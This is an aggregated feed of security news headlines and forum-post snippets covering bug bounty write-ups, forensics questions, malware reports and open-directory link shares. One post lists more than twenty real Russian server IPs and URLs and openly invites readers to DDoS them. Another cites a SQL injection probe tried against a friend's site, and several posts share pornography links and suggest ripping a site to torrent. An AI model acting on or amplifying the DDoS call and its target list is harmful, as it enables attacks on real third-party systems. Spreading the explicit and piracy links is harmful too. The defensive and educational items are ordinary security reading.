    Hi, I am exploring Burpsuite and HTTP requests. I was convinced that a cookie was only set after login. I tried to intercept a (failed) login on a simple web form and I got this: POST / HTTP/1.1 Host: markup.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 32 Origin: http://markup.htb Connection: close Referer: http://markup.htb/ Cookie: PHPSESSID=33foj37c9f8tburjbdufbtu8ln Upgrade-Insecure-Requests: 1 username=test&password=test I noticed that the Cookie header is already present, even before my request can reach the webserver. Can someone enlighten me on this? Thank you!! submitted by /u/g-simon [link] [comments]
    I found a major security flaw in Lens.com website, need advice on how to proceed
    I apologize if this is the wrong place to ask this question but here goes. Without getting into details I found a way to access a user account without permission. I submitted it to kb.cert.org (didn't know where else to submit it) but they said they don't handle issues with live websites, I also informed Lens.com but honestly they didn't seem to care and have since ghosted me. I don't want to release the details and risk the (I can only assume) 7 people who still use that terrible site but I'm not sure how else to bring enough attention to this to get them to fix it. Any advice? Thanks. submitted by /u/AngryHumanoid [link] [comments]
    Providing SSN over voicemail for employer to access fingerprinting results? is it safe? Says she will delete the voicemail when her meeting sends.
    Ends* not sends, typo. I got fingerprinted for a background check (I'm working in education, at a private school) and have to tell my SSN to the employer so they can log in to the database to check the fingerprint results before I start. I'm not comfortable providing my SSN over email, and one of my employers told me that was okay and I can give the employer in charge of it a call. I emailed the employee and she told me that she will be in a meeting until the day ends, and if I could leave my SSN through voicemail she will delete the message once the meeting is over and will run the SSN through the database. She told me she couldn't do tomorrow since she was leaving the country, and I need to give it before Monday, the day I start, to have the results checked. Is this safe, to leave a voicemail with my SSN, given that she will delete it afterwards? It seems my only option; or should I just forget this job altogether if this is my only choice, or request someone else who is available to do it with? I think she is the only one..... Update: I decided to do it since time was ticking, since I start Monday and the employer is off to another country tomorrow so I won't be able to connect with her, which I find very weird. Did I put myself at risk?? Probably. Did I feel immediate regret after doing it? Yes I did. Nervous as heck, I hope I will be fine after this. submitted by /u/lostspirit10 [link] [comments]
    RSA Netwitness
    Hi guys, I recently started working as QA in NW and wanted to check what folks on field actually think of it. Have you ever tried or had hands on with RSA Netwitness SIEM? Any feedback on UX, Threat hunting, correlation capabilities etc? Thanks! submitted by /u/Peanutbutter-0 [link] [comments]
    Is this tool worth it ?
    I've been following these guys for quite some time now, since a friend of mine working at a large insurance company told me they use the platform internally. But I'm still not sure whether it is worth it. A few days ago, they announced they went open-source; I gave it a try and it looks cool. I ran a network scan with multiple tools at the same time (nmap, tsunami, nuclei) and got back a full report with just a few commands. The thing is I am still confused on the difference between the open source and the paid version. Have you tried the platform before? Do you think it is worth the money? submitted by /u/deadlyhayena [link] [comments]
    Anyone know about difference between BGP and DNS communication?
    Hi guys, I'm a student in a software engineering major; these days I'm interested in RPKI hijacking. I saw the news that by BGP hijacking, cryptocurrency is now in danger. As far as I know, RPKI is the certificate of the router, and without RPKI the risk of BGP hijacking is more dangerous. But I can't understand the difference between BGP and DNS communication. Of course I did search on Google, but it is too deep for me to understand. Please teach me the difference between BGP and DNS communication easily... (to the point where newbies can understand) submitted by /u/Late_Ice_9288 [link] [comments]
    vulnerable?
    Hi guys, how do I find out whether my own ip address is vulnerable atm ? submitted by /u/alicia30765 [link] [comments]
  • Open

    How I found a single-click open redirect at xiaomi (Arabic)
    Single click open redirect Peace be upon you, today I'm writing to you about how I found a vulnerability Continue reading on Medium »
    How I Hacked the Dutch Government with SQLi and Won the Famous T-Shirt?
    Hello, those who are at the computer day and night. Continue reading on Medium »
    Take part of our Bug Bounty Program ‍
    As you well know Avacash.Finance is a fork of Tornado.cash in the Avalanche Blockchain, which means that we offer a fully decentralized… Continue reading on Medium »
    Mars Protocol offers up to $1 million payout in bug bounty program with Immunefi
    More than 20 contributors from around the world have spent nearly a year developing Mars from scratch in the Rust programming language… Continue reading on Medium »
    $$$ Bank Verification Bypass(Broken Object Level Authorisation)
    Hey Readers 👋, Hope you are doing great, Continue reading on InfoSec Write-ups »
  • Open

    ODs/Calibre servers from Russia
    In solidarity with ukrainian people, after the cyber attack of russian goverment against ukrainian digital assets to prepare their invasion, you're friendly invited to attack these servers located in Russia unto DDOS. Help us to complete this list : ODs https://julia.paimon.pro/ https://91.240.125.178/ http://files.net57.ru/ http://b1.artplanet.su/ http://5.56.134.67:8080/ http://178.140.239.157/ http://91.214.68.245/ http://212.109.223.247:9000/ http://188.226.41.25/ https://109.194.141.225/ http://5.8.64.57/ https://45.84.225.49/ http://195.218.199.70:8888/ https://193.106.132.50/ http://195.93.160.105/ http://109.200.155.175/ http://176.193.170.202/ http://141.101.188.153/ http://80.78.193.77:8080/ Calibres http://87.117.1.35:9191/ http://90.188.92.137:8080/ http://37.143.24.7:8080/ http://89.111.132.113:8180/ http://80.234.32.202:8888/ http://176.12.99.146:8123/ http://136.169.223.16:8080/ https://195.91.231.203:8443/ I hope the Russians love their children too ! Slava Ukraine ! ​ https://preview.redd.it/h44axndgquj81.jpg?width=281&format=pjpg&auto=webp&s=ea63007f203cd1f7fe4bd3c434620b969861e464 submitted by /u/krazybug [link] [comments]
    Diff links to other places, funny music etc...
    Ok went for a wander and here are a few findings not claiming they are all new but just what I found on a rabbit hole day... https://www.pyrocam.com/files/Video/funny/ next... http://stephenleblanc.com/backup/stephen/projects/Alex%20recovered/BlackBerry/music/Media%20Sync/ next... http://ftp.dyslexicfish.net/music/ next http://mediamusic-journal.com/video/ next https://www.creativebone.co.uk/video next... http://projects.csail.mit.edu/video/history/robotics/ ​ cannabis stuff plus other... https://www.thevespiary.org/library/Files_Uploaded_by_Users/llamabox/ ​ Sounds language stuff... http://211.110.1.18/Suda_Data/ ​ cooking http://www.medigaplife.com/videos/recipes/ ​ Funny's old but still funny gif jpg ect... http://www.brainbox.cc/funny/ ​ Memes what was relevant then... http://www.mercilesstruth.com/memes/ ​ Funny yep just funny, some old chan stuff, vids evt... http://tajgoren.net/bildarkiv/Download/ http://tajgoren.net/bildarkiv/Download/Funny/ ​ Well movies music'ish just stuff... https://johnbot.org/Share/ ​ Lots of images. Stay out of the folder WTF... http://148.72.150.188/archive/access/images/ ​ Images funny'ish do not watch 'SickBoobie Choumi.wmv' http://www.amickracing.com/misc/ ​ Funny, music. MP4s and lots more... http://www.aircam6600.com/1/mp4/ ​ Ok well done if you got through them. You saw the hidden link...;0) submitted by /u/xanderTgreat [link] [comments]
    Just a few xxx links for now...
    Lots of xxx movies https://artserotica.com/videos/ Been posted before but still up http://salepute.fr Short Jav I think some pixelated... https://www.xxxx-videos.com as above... https://kijyoui-douga.com/wp-content/uploads/2017/07/?SD Jav as above http://javichuparadise.com/wp-content/videos/ Not sure if this meets the open directories guides... http://www.wo-fd.xyz/?/ Lots of images with a few vids... http://real-uksex.com/wp-content/uploads/ Lots of MP4's http://24.138.249.6/Peliculas/Adultos/ What it says in the link Mandy Flores porn life images... https://mandyflores.com/content/ Bit of good old BDSM http://213.32.1.25 submitted by /u/xanderTgreat [link] [comments]
  • Open

    The Top-Notch Red Team Penetration Testing Services in Israel, USA, UK
    Continue reading on Medium »
  • Open

    Dispatch From The Digital Fringes (01.022022)
    Welcome to our launch here on Medium! I’m Matt Schultz — former Digital Archivist, Curator & Preservationist. I’m so excited to be… Continue reading on Medium »
    The ultimate guide to threat intelligence for corporate security
    This definitive guide to threat intelligence provides everything you need to know about implementing and using threat intelligence within… Continue reading on Medium »
  • Open

    SecWiki News 2022-02-24 Review
    Abusing ESC7 in AD CS by ourren Three precise definitions of threat intelligence by ourren Leveraging machine learning to find security vulnerabilities by ourren Research report on the current state of behavioral security in mobile internet application supply chains (SDKs) by ourren A BERT-based method for measuring web service policy compliance by ourren LastPyMile - identifying differences between software package source code and released code by ourren Summary of machine-learning-based security datasets by ourren How does Xloader perform encrypted C&C communication? by Avenger For more of the latest articles, visit SecWiki
  • Open

    SockDetour – a Silent, Fileless, Socketless Backdoor – Targets U.S. Defense Contractors
    SockDetour is a custom backdoor being used to maintain persistence, designed to serve as a backup backdoor in case the primary one is removed. The post SockDetour – a Silent, Fileless, Socketless Backdoor – Targets U.S. Defense Contractors appeared first on Unit42.
  • Open

    Zero-day XSS vulnerability in Horde webmail client can be triggered by
    Article URL: https://portswigger.net/daily-swig/lt-p-gt-zero-day-xss-vulnerability-in-horde-webmail-client-can-be-triggered-by-file-preview-function-lt-p-gt Comments URL: https://news.ycombinator.com/item?id=30453652 Points: 2 # Comments: 0
  • Open

    After leaving a job, would you access your former company's accounts?
    A proper offboarding process can reduce the harm departing employees can do to their former employer.
    FreeBuf Morning Report | US receives ransomware warning; hundreds of Ukrainian computers hit by wiper malware
    A Nigerian national pleaded guilty in the US District Court for the Southern District of New York to breaking into a company's accounts and stealing payroll deposits.
    Russia's blitz on Ukraine: the cyber war began long ago
    The Russia-Ukraine conflict has been simmering for a long time.
    Social media attacks set another record in 2021, financial security still tops the list
    Social media has become one of the channels hackers use to distribute threats; attacks through this channel increased twofold over the course of 2021.
    Extortion does not stop after the ransom is paid
    A global survey of ransomware victims' experiences highlights the lack of credibility of ransomware actors, because in most cases where a ransom was paid the extortion continued.
    March 11, 7 pm | Under the new security infrastructure, how to build asset identification capability
    At 19:00 on Friday, March 11, Alibaba Group Security Department senior security expert 阿刻 will give a public lecture titled "Under the new security infrastructure, how to build asset identification capability".
    ASUS subsidiary ASUSTOR attacked, ransom of over ten million yuan demanded
    This ransomware attack affected many users worldwide and sparked widespread discussion on the ASUSTOR forums.
    Operations and management of data center infrastructure
    To standardize the operations management of data center infrastructure, enterprises and institutions should refer to the relevant national standards to establish an operations management system, rules, processes and other measures that ensure information services run securely, stably and normally.
    Using credential stuffing, a Nigerian hacker took other people's wages for himself
    Starting in July 2017, the attacker compromised a total of 5,500 user accounts and transferred a total of 800,000 US dollars.
    Security Season 1 - [No matter is too small, security first]
    A virus is a program that covertly infects a computer system and causes damage. The virus code hides in other programs, the hard disk partition table or the boot sector, waiting for an opportunity
    Microsoft insight: identity management vulnerabilities become the top threat to digital security
    Over the past two years, the new normal under the pandemic has accelerated digital transformation worldwide, and digital capability has become a core capability for the survival and development of enterprises and individuals.
    Cybercrime case analysis - illegally obtaining app data (42)
    Illegally obtaining app data for private gain constituted the crime of illegally obtaining computer information system data, with a sentence of four years and six months in prison.
    No visibility, no security! Top ten foreign SASE vendors worth watching (2022 edition)
    Traditional network security measures will not be able to cope with complex network architectures; improving network visibility will be an important development direction for network security technology.
    Daiwa Securities (China) is hiring! An information security management position awaits your application
    Daiwa Securities (China) Co., Ltd. is a newly established foreign-controlled securities company based in Beijing, China.

    Getting to know fuzzing in Go
    Release 1.18 will add fuzzing support. Continue reading on Medium »

    TP-Link WR740 router backdoor vulnerability
    Author: IOTsec-Zone Original link: https://mp.weixin.qq.com/s/SWFLV6H1zKWQyvnC0JGGhg 0x00 Description Test environment: Ubuntu 18.04 Firmware version: wr740nv1_en_3_12_4_up(100910).bin Vendor: TP-Link Vendor site: https://www.tp-link.com.cn/ ZoomEye search app:TP...
    CodeQL meets Shiro550
    Author: SummerSec This article is a contributed submission; Seebug Paper looks forward to your contributions, and every accepted article receives a gift! Submission email: paper@seebug.org JDK built-ins As mentioned above, the search in JDK8u found a total of 7 classes that could replace the ComparableComparator class, but only two of them can be instantiated directly: String#CASE_INSENSITIVE_ORDER and AttrCompare; the access level of the other 5 classes...

    [NSFW] Pornographic Images
    Public nudity - enjoy https://public.flashingjungle.com/exhibitionism/ submitted by /u/-Phinet- [link] [comments]
    DorkSearch is a tool that gives you a list of prebuilt templates for Google Dorks for different use cases.
    submitted by /u/pentestscribble [link] [comments]
    Hollywood Movies 1900-2020 - If download is slow, cancel and try again after 30 seconds.
    submitted by /u/SatansMoisture [link] [comments]
    Bit more porn...
    This site I have already ripped and made into torrent but it's still up... itaporno Remember use a VPN if you rip it... submitted by /u/xanderTgreat [link] [comments]

    Looking for Place to Find latest Computer Forensic Case News
    I'm currently enrolled in a Digital Forensics class and have to do a project where we do a presentation on a current technology or case in Digital Forensics. Anybody know of a good way to find these articles, like what to put in the search bar or what websites to best check out? submitted by /u/Mattdarkninja [link] [comments]
    Windows 10 reset artifacts
    Can someone help me to find traces of artifacts left on windows 10 machine which has been reset 5 months back and repurposed to another user? A reference material on finding windows 10 reset and refresh artifacts will be very useful. Also, suggestions on any tool that can be used to recover data. submitted by /u/Pepperknowsitall [link] [comments]
    Putting user behind keyboard/knowledge
    If files are found automatically synced to a computer, with no evidence that the suspect had knowledge of them (folder never opened, file never viewed), and the file was not downloaded by any deliberate action, and it cannot be determined who uploaded them in the first place or which device was used to do so: is it enough to make a case based on the name on the account when multiple individuals reside at a place? submitted by /u/Complete-Cockroach80 [link] [comments]
    Newcomer to the field
    If this post is against the rules in any way I apologize; please take it down. Greetings everyone. I graduated last year with my bachelor's in digital forensics and decided to stay in my country for a while and try to get a job here (Puerto Rico). Sadly I have not, and I am considering moving to the US to get a job there. Any advice? Sites to search for job offers in this area for graduates? States I should stay away from because of high cost of living? Any help I would appreciate greatly. submitted by /u/andrew9514 [link] [comments]

    Automating bug bounties
    submitted by /u/pedro_benteveo [link] [comments]
    The vulnerability research team @GitLab is introducing an open-source community-driven advisory database for third-party security dependencies
    submitted by /u/howie1001 [link] [comments]
    Remote Code Execution in pfSense <= 2.5.2
    submitted by /u/smaury [link] [comments]
    tmp.0ut Volume 2
    submitted by /u/VVX7 [link] [comments]
    You can still CSRF POST requests under the default browser SameSite cookie policy. How to jump through the required hoops.
    submitted by /u/MysteriousHotel3017 [link] [comments]
    Cyrus SASL 2.1.28 has been released with SCRAM improvements and CVE fixes
    submitted by /u/Neustradamus [link] [comments]

    Bug Bounty: Do You Need To Be A Programmer?
    Disclaimer: we are talking about the research of web applications only. Continue reading on Medium »
    Beginner Bug Bounty Journey
    # Introduction Continue reading on Medium »
    What You can Learn from Coinbase Hack with USD250k Bounty
    As a bug bounty hunter, you may experience something like below: Continue reading on Medium »
    How to hunt for bug bounties
    The first step when looking for bug bounties is to get to know the target. Continue reading on System Weakness »
    2 Days Left for IWCON 2022 Virtual Infosec Conference & Networking Event
    Never attended a virtual networking event before? Your FAQs answered + Check our live demo here. Continue reading on InfoSec Write-ups »

    How to use satellite imagery to visualise changes in landscapes
    And how those changes can help you chronolocate an event. Continue reading on Medium »
    Geolocating TikTok videos of Russian military vehicles near Ukraine
    A little persistence can help pinpoint locations Continue reading on Medium »
    Bus and Rocks — OSINT Challenge 19 and 20
    Quiztime (contributors @kollege and @mahrko) shared two OSINT quizzes with us. Both objects were kind of weird. For kollege's we have to… Continue reading on Medium »

    Pentesting a windows box
    Hello everyone! Just a question: how do you start a Windows box? I have been doing some HTB these past few weeks, but only testing the Linux boxes. How did you guys learn to pentest a Windows box? (I don't have any background in Active Directory stuff.) Thank you! submitted by /u/pldc_bulok [link] [comments]
    Implications of disabled, factory install of Facebook on Android device.
    I do not use Facebook, but it came pre-installed on my phone. I can't uninstall it because Zuck owns my phone, but I have disabled the app and reverted it to the original factory install. I'm concerned about having an extremely out-of-date version remaining, probably rife with security flaws. Does disabling the app effectively lock it out from receiving or transmitting? submitted by /u/spinfip [link] [comments]
    Email compromised, address spoofed, or elaborate phishing email?
    Not sure if this is the best subreddit to ask about this. Let me know if there's a better subreddit for this post. My email account has a unique, very strong password and two-factor authentication. This morning, I noticed in my junk folder there was one of those "failed to deliver" emails meant for another address, like those undeliverable emails you get when you try to email an address that doesn't exist and it bounces back to you. Interestingly, it came from another domain instead of postmaster@outlook. I never sent this email, I don't see an email like it in sent, and I don't see anything unusual in drafts or sent. I checked the account's login activity and there were no sign-ins, only failed attempts to sign into the account from Asia. I have 2FA enabled so I should've been notified if anyone had attempted to sign into the email account, either today or previously at any point other than when I myself signed in. Furthermore, the bounce-back email had my address as the sender, but the contact name on it was just random letters, not the name I have on my account. Is my email compromised, did someone spoof the address, or is this an elaborate phishing attempt that I'm BCC'd on? submitted by /u/NotMSUPD [link] [comments]
    PluralSight Subscription Expiring, Any Others We Should Look Into Instead?
    After being unemployed for 2 years(stay at home dad) I wanted to rejoin the workforce but wanted to move past helpdesk/desktop level(had 5yrs exp) and decided Cybersecurity was the way to go. I did not have a tech degree, or any other certs and was always a poor student, but I studied my butt off for 2 months and got my Sec+ and a month later landed the dream job making the big bucks!!! aka INFOSEC focused sys admin. Our PluralSight subscription is expiring and before I blow my budget on it and renew it, I wanted to know if there are any others I should be looking into instead? This would be for a team of 2-4 individuals. Ideally looking for an all around system, with the focus on Cloud, INFOSEC, and SCCM. In my current duties I touch everything, SCCM, AWS, Azure, GCP, VmWare, Citrix, C…
    Using Quantitative Risk Metrics to get Csuite buy in?
    When I did my Master's we did a great section on quantitative vs qualitative risk management that I really want to implement. The logic to me seems sound in that a value of asset x should inform the costs you are willing to incur to mitigate risks. Getting away from vague "I feel" statements about cyber risk to quantitatively say asset x is worth y to the company so investing w to reduce risk is basic math the c-suite can get. My barriers to this are: Getting an effective asset valuation as no one seems to track initial investment and sustainment costs let alone cyber security costs. Building this into SOP when tagging assets. Tagging right now is limited so this needs to be fixed too. Anyone here effectively put in quantitative risk practice that can share what worked? submitted by /u/finnthethird [link] [comments]
    what's the deal about ip addresses?
    I know this is such fundamental basic stuff, but why is this thing so crucial? submitted by /u/alicia30765 [link] [comments]

    Bolt from HackTheBox — Detailed Walkthrough
    No content preview
    Nibbles From HackTheBox
    No content preview
    2 Days Left for IWCON 2022 Virtual Infosec Conference & Networking Event
    No content preview
    Intercepting Android Emulator SSL traffic with burp using magisk
    No content preview
    [THM] Ignite Writeup
    No content preview
    Mobile phone number verification bypass
    No content preview

    Bash Tricks for Command Execution and Data Extraction over HTTP/S
    submitted by /u/cyberbutler [link] [comments]
    What’s Next in Microsoft Sentinel?
    submitted by /u/SCI_Rusher [link] [comments]

    SecWiki News 2022-02-23 Review
    Bvp47: technical details of the top-tier backdoor of the US NSA's Equation Group by ourren. For more recent articles, visit SecWiki

    Deliviry Club Courier app (v. 3.9.25.0); Disclosure phone number of client.
    Mail.ru disclosed a bug submitted by 388: https://hackerone.com/reports/1382570 - Bounty: $150
    Add upto 10K rupees to a wallet by paying an arbitrary amount
    Zomato disclosed a bug submitted by ashoka_rao: https://hackerone.com/reports/1408782 - Bounty: $2000
    Incorrect authorization to the intelbot service leading to ticket information
    TikTok disclosed a bug submitted by johnstone: https://hackerone.com/reports/1328546 - Bounty: $15000

    Hackers use Qbot and the Zerologon vulnerability to compromise an entire domain
    Translator: Knownsec 404 Lab translation team Original link: https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ In this intrusion (beginning in November 2021), a threat actor gained an initial foothold in the environment by using the Qbot (aka Quakbot/Qakbot) malware. Shortly after the Qbot payload executed...
    "Chrome V8 Source Code" series: why "Equal" and "StrictEqual" differ
    Author: 灰豆 This article is a contributed submission; Seebug Paper looks forward to your contributions, and every accepted article receives a gift! Submission email: paper@seebug.org Introduction substring, getDate, catch and the like are commonly used JavaScript APIs. The next few articles will explain the design philosophy, source code and key functions of these APIs in V8, and use examples to explain how JavaScript is initialized and run inside V8, and how it...

    Types of attacks I have learned
    Man in the middle attack Continue reading on Medium »

    Study finds fast-growing companies face a higher risk of hacking
    According to the latest research from US passwordless identity platform provider Beyond Identity, fast-growing companies are more likely to suffer cybersecurity breaches than companies with slower growth.
    91% of UK organizations hit by email phishing attacks in 2021
    According to Proofpoint's 2022 State of the Phish report, more than nine in ten (91%) UK organizations were successfully compromised by email phishing last year.
    Would you fall for a phishing email like this?
    Phishing emails are everywhere; keep your eyes open to guard against them.
    Attention: Google MFA verification cannot stop this type of phishing attack
    A new type of phishing attack can bypass MFA: attackers use VNC screen sharing to have the target user log in to their account directly on an attacker-controlled server, thereby bypassing MFA.
    15 days to go! The CIS 2021 Spring edition livestream invites you to meet online
    On March 9, let's meet in the livestream; see you there.
    FreeBuf Morning Report | DDoS attacks spiraled upward in 2021; Sea Mar accused of negligence over data breach
    Neustar Security Services released a report detailing the continued growth of cyberattacks in 2021, with an unprecedented number of DDoS attacks.
    The state of the telecom fraud black-and-grey industry chain (Part 3): "no-contract" payment, proxy collection and proxy payment have become the mainstream money-laundering methods for fraud
    In scams such as fake online earning and fake investment, victims readily trust the other party because, early in the scam, they receive task commissions paid out by the scammers.

    Rust Related CVE Entries
    Article URL: https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=rust Comments URL: https://news.ycombinator.com/item?id=30438575 Points: 2 # Comments: 0
    Cyrus SASL 2.1.28 has been released with SCRAM improvements and CVE fixes
    Article URL: https://www.cyrusimap.org/sasl/sasl/release-notes/2.1/index.html#new-in-2-1-28 Comments URL: https://news.ycombinator.com/item?id=30435871 Points: 1 # Comments: 0


    Preparing for the Cyber Impact of the Escalating Russia-Ukraine Crisis
    Recommendations on how to proactively prepare to defend against the potential cyber impact of the escalating Russia-Ukraine crisis. The post Preparing for the Cyber Impact of the Escalating Russia-Ukraine Crisis appeared first on Unit42.

    Best CS undergrad programs for a prospective pentester?
    Wondering if anyone here can speak to which college CS programs best prep their students to take on pentesting. I'd prefer a program that focuses on getting me the skills I need to understand the computer and just to give me general depth in my field. I know pentesting is what I want to do professionally, so something that would let me focus on that is preferable. submitted by /u/NotVeryMega [link] [comments]
    Is it possible I could be targeted?
    Kinda what the title says. I started out this morning with the ability to call out. Then my phone just started hanging up instantly. Put Sim in different phone, same thing. Tried calling it, straight to voicemail. Went to Walmart to get a new sim and phone number. Got ten minutes of the ability to make calls, then the same exact thing. Got a new phone, different carrier. Same thing ten minutes, then no more voice ability. Could it be possible some one put out some kinda hit on me? submitted by /u/YddishMcSquidish [link] [comments]
    How much day rate for pentester contractors in the UK?
    Due to an increased surge of work from a new contract, my company needs penetration tester contractors who would be good to use on an ad-hoc basis. What are the typical rates for pentesters, and how long does a typical contract go on for? E.g. £500 a day for 3 months for someone with 3-5 experience. Is this reasonable pricing? I have been asked to find ones in the UK due to familiarity with certain frameworks like Cyber Essentials and CREST. It would be great if someone could share some figures so I know what to expect with varying experience and qualifications such as CRT and CCT as well. Thank you. submitted by /u/HamsterMoisture [link] [comments]
    EDR etc for ONE linux box?
    What setup/software/etc do you recommend to protect my personal linux computer? E.g. vectors I see: it could get pwned by malicious python packages, malicious VSCode extensions, malicious NPM etc. Less likely: Browser exploits. I was experimenting with only letting my browser phone out (the usual malware on linux just connects out naively). But then I have to open everything up again to install stuff. ClamAV is a joke, but something like carbon black makes no sense for a single box. Ideas? submitted by /u/medusabadhairday [link] [comments]
    SIEM Onboarding for IaaS/PaaS over Azure/AWS
    As someone who has been witnessing quite an amount of transformation across all sectors, I have been wondering what improvements vendors and OEMs have made on the SIEM onboarding front. Do OEMs/vendors still prefer/recommend syslog, installing proprietary agents or the oh-so-obsolete RPC (for Windows) to onboard systems, or have some vendors/OEMs also started pushing for cloud-native solutions like Event Hub/SQS? A lot of vendors do show a green light on integration with S3/Event Hub but don't support any sort of parsing for these log sources (Windows and Linux); one cannot expect anyone to actually create parsers from scratch for the entire Windows ecosystem. As large orgs start deploying Control Towers with dedicated logging buckets anyone can poll off and ingest, how do you guys scale your SIEM deployments and utilize these architectural changes? submitted by /u/w33ha_AD [link] [comments]
    Where to turn on VPN (laptop vs phone) when hotspotting my phone
    Let's get straight to it - I have two questions regarding where to turn on VPN (laptop vs phone). Let's say I'm at a hotel and would like to hotspot my phone so that I can access the internet using my laptop. Question is, where do I turn on VPN? On my phone or on my laptop? Based on my research, many seem to suggest turning on VPN on the laptop. My question then is, what if I would like to browse the internet on my phone? Or do stuff on WhatsApp, etc.? Must I turn on VPN on my phone for these activities too? submitted by /u/AliveandDrive [link] [comments]
    Is it SQL injection?
    Hey Chief, a friend of mine has set up a website where she used a hosting service, I don't remember its name. The admin login functionality from that hosting service asked for a username and password combination. I typed a few SQLi payloads (' or 1=1 kinda stuff) but instead of throwing a "login password/username incorrect" error, it showed a pretty unusual error and took pretty long to do so. Is that a sign of SQL-based injection? Does that mean the website is likely vulnerable to SQL injection or smtg similar? Please help, because that friend of mine has set up her website for business usage and isn't sure that hosting provider is secure and whatnot. submitted by /u/The_Intellectualist [link] [comments]
    Security automation
    I have been using node-red to automate a couple of daily tasks, for example: enrich alerts with VirusTotal intelligence; test and verify that the DLP configuration is set up correctly; add IPs to a block list in AWS WAF; pull metrics from CrowdStrike into PowerBI for the manager report; etc. I am considering writing a blog or sharing in a security talk. Is there anyone interested in this topic? Any good platform to speak about this? submitted by /u/Calm_Scene [link] [comments]

    “OSINT Investigations: We know what you did that summer” Notes
    OSINT Investigations: We know what you did that summer by Information Warfare Center is packed with OSINT advice and resources, including… Continue reading on Medium »
    Cybersoc DVLA OSINT writeup
    Following is an OSINT challenge DVLA writeup offered by cybersoc. Continue reading on Medium »
    Wonderland- Tryhackme CTF
    Steps Continue reading on Medium »
    OSINTGRAM
    What is osintgram ? Continue reading on Medium »
    Capture The Talent — Pwn Write-up : Global Pandemic
    From Saturday, February 19 to Sunday, February 20, 2022, the Capture The Talent CTF was held. 🏆Final ranking: 1/52 Continue reading on Medium »

    Seeking Freelancer for WeChat Recovery
    Computer Forensics For WeChat - Seeking A Freelancer We need someone who can restore WeChat messages from an iPhone backup. Please contact me privately for details. submitted by /u/P2T-2022 [link] [comments]
    Volatility 3 commands and usage tips to get started with memory forensics. Volatility 3 + plugins make it easy to do advanced memory analysis.
    submitted by /u/DFIRScience [link] [comments]
    Certs
    Any certs you recommend for a cs analyst to get more knowledge and skills in digital forensics? submitted by /u/mooncrestle [link] [comments]
    When carving a file type without a footer, how do I know the range?
    I am doing an assignment, and in the assignment volume, I found a Bitmap header. How do I know the range of the file? My professor said he would go over it but never did submitted by /u/KTthemajicgoat [link] [comments]

    Samy Kamkar takes down MySpace
    Greatest Moments in Hacking History: Samy Kamkar Takes Down Myspace — YouTube Continue reading on Medium »

    IDOR in "external status check" API leaks data about any status check on the instance
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1372216 - Bounty: $610
    broken authentication (password reset link not expire after use in https://network.tochka.com/sign-up)
    QIWI disclosed a bug submitted by uddeshaya: https://hackerone.com/reports/1401891 - Bounty: $100
    FULL SSRF
    Acronis disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1241149
    Claiming the listing of a non-delivery restaurant through OTP manipulation
    Zomato disclosed a bug submitted by ashoka_rao: https://hackerone.com/reports/1330529 - Bounty: $3250
    api key exposed in github.com//
    8x8 disclosed a bug submitted by adnanmalikinfo: https://hackerone.com/reports/1454965

    Paper HackTheBox Write-Up
    Easy box made by Jin Continue reading on Medium »
    The most underrated tool in bug bounty. (and the filthiest one liner possible)
    One liner tool chains for bug bounty, dependent on one vital tool. Continue reading on Medium »
    SQLi: next level
    You may have seen some SQL injections whose exploitation is not as straightforward as what you see in ethical hacking courses, like… Continue reading on Medium »
    rDEX Bug Bounty Recap
    Overview Continue reading on StaFi »
    PORTSWIGGER WEB SECURITY - XXE (XML EXTERNAL ENTITY) INJECTION LAB SOLUTIONS
    XXE (XML External Entity) Injection allows an attacker to inject or modify XML data in a web application… Continue reading on Medium »
    Behind-the-Scenes of Infosec Writeups
    How the publication grew since 2017, one message at a time. Continue reading on InfoSec Write-ups »
    My Pentest Log -7-
    Greetings to all from Sergius and Bacchus, Continue reading on Medium »
    2FA Misconfiguration leads to adding any number as 2FA verification
    I was testing 2FA on a website. At first, I tried to bypass 2FA but I was not successful, then I thought of something else. What if I can… Continue reading on Techiepedia »

    Operation Cache Pandas
    submitted by /u/dmchell [link] [comments]
    Chasing the Silver Petit Potam to Domain Admin
    submitted by /u/ZephrX112 [link] [comments]

    How to Fix the specialadves WordPress Redirect Hack
    Attackers are regularly exploiting vulnerable plugins to compromise WordPress websites and redirect visitors to spam and scam websites. This has been an ongoing campaign for multiple years. Payload domains are regularly swapped out and updated, but the objective remains largely the same: trick unsuspecting users into clicking on malicious links to propagate adware and push bogus advertisements onto victims' desktops. The most recent variation of this WordPress hack involves the following domain: specialadves[.]com. If your website is redirecting visitors to pages that look something like this, then your website is likely compromised. In today's post we will review how to remove the specialadves malware from your WordPress website. Continue reading How to Fix the specialadves WordPress Redirect Hack at Sucuri Blog.

    Challenge-3 Weekly Cloud Security Challenge
    submitted by /u/0xdeadbeef0000 [link] [comments]
    Horde Webmail 5.2.22 - Account Takeover via Email
    submitted by /u/monoimpact [link] [comments]

    For the females & gay members of reddit...
    Not saying you have to be gay to enjoy good looking men getting off ... Has Rick & Morty, Mr Robot plus other stuff so not all men getting all hot and sweaty... Mp4's, images etc... submitted by /u/xanderTgreat [link] [comments]
    Construction Company or not...
    Not been around for a while but found this one and wanted to share it...yep porn... Look in folders...mp4's submitted by /u/xanderTgreat [link] [comments]
    a bunch of electronic music and samples, still looking through it but there's some fun stuff so far
    submitted by /u/subwaytech [link] [comments]

    SecWiki News 2022-02-22 Review
    Introduction to and survey of device fingerprinting technology (Part 1) by ourren. For more recent articles, visit SecWiki

    panic: send on closed channel - close your channels properly 🕵🏼‍♂️
    Goroutines and channels are among the most central features of golang. However, if they are not used carefully and checked thoroughly, they can create a variety of problems. One of these is sending a value to a channel that has already been closed; in that case the application terminates with a panic. panic: send on closed channel goroutine 1 [running]: main.main() /tmp/sandbox2358964969/prog.go:19 +0xfc There is a simple way to prevent this: before sending a value to the channel, check whether the channel has been closed, as in the safeCheck function below, and decide whether to send the value based on the result.

    The cutting-edge conundrum: Why federal agencies can’t compromise on security
    Invicti sat down with Ryan Cote, former CIO for the Department of Transportation, to chat about AppSec in government and how agencies can modernize security. READ MORE

    Ethereum/EVM Smart Contract Reverse Engineering & Disassembly
